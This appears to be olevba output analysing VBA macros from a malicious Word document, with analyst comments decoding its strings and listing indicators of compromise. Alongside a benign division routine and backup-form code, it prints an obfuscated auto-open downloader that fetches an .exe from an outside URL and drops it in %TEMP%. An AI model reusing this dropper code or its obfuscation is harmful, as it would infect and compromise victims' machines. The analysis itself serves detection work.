      ' and traps three specific run-time errors -- division by zero (11),
      ' overflow (6) and type mismatch (13) -- by sending the user back to the
      ' relevant prompt.  Any other error number ends the procedure.
      '
      Dim message As String
      Dim quotient As Single
      Dim divisor As Variant
      Dim dividend As Variant
      Dim errCode As Long
      '
      ' Route run-time errors to the handler at the bottom
      '
      On Error GoTo DivisionErrorHandler
      '
      ' Ask for the dividend; Cancel (empty string) ends the procedure
      '
  PromptForDividend:
      dividend = InputBox("Enter the dividend:", "Divider")
      If dividend = "" Then
          Exit Sub
      End If
      '
      ' Ask for the divisor; Cancel (empty string) ends the procedure
      '
  PromptForDivisor:
      divisor = InputBox("Enter the divisor:", "Divider")
      If divisor = "" Then
          Exit Sub
      End If
      '
      ' Perform the division (this is where errors 11, 6 and 13 arise)
      '
      quotient = dividend / divisor
      '
      ' Report the result
      '
      message = dividend & " divided by " & divisor & " equals " & quotient
      MsgBox message
      '
      ' Normal completion skips the handler below
      '
      Exit Sub
      '
      ' Error handler: describe the error, then resume at the matching prompt
      '
  DivisionErrorHandler:
      errCode = Err.Number
      message = "An error occurred!" & Chr(13) & Chr(13) & _
                "Error number:  " & errCode & Chr(13) & _
                "Error message: " & Err.Description
      MsgBox message, vbOKOnly + vbCritical
      If errCode = 11 Then
          ' Division by zero: only the divisor needs re-entering
          Resume PromptForDivisor
      ElseIf errCode = 6 Then
          ' Overflow: start over with both values
          Resume PromptForDividend
      ElseIf errCode = 13 Then
          ' Type mismatch: re-enter whichever value is not numeric
          If IsNumeric(dividend) Then
              Resume PromptForDivisor
          Else
              Resume PromptForDividend
          End If
      End If
      '
      ' Anything else, just quit
      '
      Exit Sub
  End Sub
  973.  
  974. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  975. ANALYSIS:
  976. +------------+---------+-----------------------------------------+
  977. | Type       | Keyword | Description                             |
  978. +------------+---------+-----------------------------------------+
  979. | Suspicious | Chr     | May attempt to obfuscate specific       |
  980. |            |         | strings                                 |
  981. +------------+---------+-----------------------------------------+
  982. -------------------------------------------------------------------------------
  983. VBA MACRO Module4.bas
  984. in file: 1913.doc - OLE stream: u'Macros/VBA/Module4'
  985. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  'Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long
  'Declare Function GetDiskFreeSpace Lib "kernel32" Alias "GetDiskFreeSpaceA" (ByVal lpRootPathName As String, lpSectorsPerCluster As Long, lpBytesPerSector As Long, lpNumberOfFreeClusters As Long, lpTotalNumberOfClusters As Long) As Long
  '
  ' NOTE(review): both Declare statements above are commented out, so this
  ' module imports nothing from kernel32 at run time.  The word "Lib" in
  ' those two comment lines is the likely trigger for olevba's "Lib" hit on
  ' Module4 -- no live DLL call is visible in this stream.
  '
  ' Constants used with GetDriveType result
  ' (same values as the Win32 DRIVE_* return codes of GetDriveType)
  '
  Public Const DRIVE_REMOVABLE = 2
  Public Const DRIVE_FIXED = 3
  Public Const DRIVE_REMOTE = 4
  Public Const DRIVE_CDROM = 5
  Public Const DRIVE_RAMDISK = 6
  '
  ' This Type is used to hold properties of the open documents
  ' (presumably filled in for the frmBackup form, which is not part of this
  ' listing -- nothing in view reads or writes these fields; confirm against
  ' the form module before relying on their meaning)
  '
  Type BackupDoc
      Name As String
      Path As String
      State As String
      Size As Long
      Selected As Boolean
  End Type
  1006. '
  1007. ' Use this procedure to display the Backup form
  1008. '
  Sub ShowBackup()
      '
      ' Display the Backup form.  The only failure this expects is being
      ' called while frmBackup is already on screen; that error is swallowed
      ' by On Error Resume Next, and the form object is released afterwards.
      '
      On Error Resume Next
      Call frmBackup.Show
      Set frmBackup = Nothing
  End Sub
  Sub HOPPOJJ2222()
  ' Downloader routine; reached from autoopen() via A121212121212 in
  ' ThisDocument, so it runs as soon as the document is opened with macros
  ' enabled.  Every string below is built from Chr() pieces to defeat
  ' keyword scans -- the decoded values are given inline for detection.
  ' HOPPOJJ1155, HOPPOJJ1177 and HOPPOJJ1122 are defined outside this stream
  ' (not visible here); from their call sites they presumably wrap
  ' CreateObject, a write-bytes-to-file helper, and some final step after
  ' the download -- confirm against the other modules before relying on it.
  '
  ' Detection angle grounded in this code: a Word process performing an HTTP
  ' GET for an .exe and then writing a new .exe into %TEMP%.

  ' HOPPOJJ1155("Microsoft.XMLHTTP") -- HTTP client object
  Set HOPPOJJ2233 = HOPPOJJ1155("M" & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & "o" & Chr(102) & "t" & "." & Chr(88) & Chr(77) & Chr(76) & Chr(72) & "T" & Chr(84) & Chr(80))

  ' .Open "GET", "http://oakwindowsanddoors.com/42/11.exe", False
  ' (synchronous request).  IoC: the download URL decoded above.
  CallByName HOPPOJJ2233, Chr(79) & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), Chr(104) & "t" & "t" & "p" & Chr(58) & Chr(47) & "/" & Chr(111) & Chr(97) & Chr(107) & Chr(119) & Chr(105) & Chr(110) & Chr(100) & Chr(111) & Chr(119) & "s" & Chr(97) & Chr(110) & Chr(100) & "d" & Chr(111) & Chr(111) & Chr(114) & Chr(115) & Chr(46) & "c" & Chr(111) & Chr(109) & Chr(47) & Chr(52) & "2" & Chr(47) & Chr(49) & "1" & Chr(46) & Chr(101) & "x" & Chr(101), False
  ' HOPPOJJ1155("WScript.Shell")
  Set HOPPOJJ2244 = HOPPOJJ1155("W" & "S" & Chr(99) & "r" & "i" & Chr(112) & "t" & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & "l")

  ' shell.Environment("Process") -- the Word process's environment block
  Set HOPPOJJ2255 = CallByName(HOPPOJJ2244, Chr(69) & Chr(110) & Chr(118) & Chr(105) & "r" & Chr(111) & Chr(110) & Chr(109) & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))

  ' Environment("TEMP")
  HOPPOJJ2266 = HOPPOJJ2255("T" & Chr(69) & Chr(77) & "P")

  ' Drop path: %TEMP%\birsafpc.exe  -- IoC: file name written by this macro
  HOPPOJJ2211 = HOPPOJJ2266 & Chr(92) & Chr(98) & Chr(105) & "r" & Chr(115) & Chr(97) & "f" & Chr(112) & "c.e" & Chr(120) & Chr(101)
  Dim HOPPOJJ2277() As Byte

  ' .Send, then read .responseBody into the byte array
  CallByName HOPPOJJ2233, Chr(83) & "e" & Chr(110) & Chr(100), VbMethod
  HOPPOJJ2277 = CallByName(HOPPOJJ2233, "r" & Chr(101) & Chr(115) & Chr(112) & Chr(111) & Chr(110) & Chr(115) & Chr(101) & Chr(66) & Chr(111) & Chr(100) & Chr(121), VbGet)
  ' Hand the response bytes and the drop path to the external helper
  ' (presumably writes the file -- helper body not visible here)
  HOPPOJJ1177 HOPPOJJ2277, HOPPOJJ2211
  ' Deliberate division by zero: raising the error is the only way the
  ' HOPPOJJ2288 label is reached, so the "handler" is the real continuation
  ' of the routine rather than error recovery.  The On Error GoTo 0 line is
  ' never executed.
  On Error GoTo HOPPOJJ2288
      a = 129 / 0
    On Error GoTo 0

  HOPPOJJ2299:
    Exit Sub
  HOPPOJJ2288:
    ' Opaque argument; what HOPPOJJ1122 does with it is not visible in this
    ' stream (it is the last step after the file has been handed off above)
    HOPPOJJ1122 ("Ki8JfHxWCPDg")
  Resume HOPPOJJ2299
  End Sub
  1045. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1046. ANALYSIS:
  1047. +------------+----------------+-----------------------------------------+
  1048. | Type       | Keyword        | Description                             |
  1049. +------------+----------------+-----------------------------------------+
  1050. | Suspicious | Open           | May open a file                         |
  1051. | Suspicious | Chr            | May attempt to obfuscate specific       |
  1052. |            |                | strings                                 |
  1053. | Suspicious | Lib            | May run code from a DLL                 |
  1054. | Suspicious | CallByName     | May attempt to obfuscate malicious      |
  1055. |            |                | function calls                          |
  1056. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  1057. |            |                | may be used to obfuscate strings        |
  1058. |            |                | (option --decode to see all)            |
  1059. +------------+----------------+-----------------------------------------+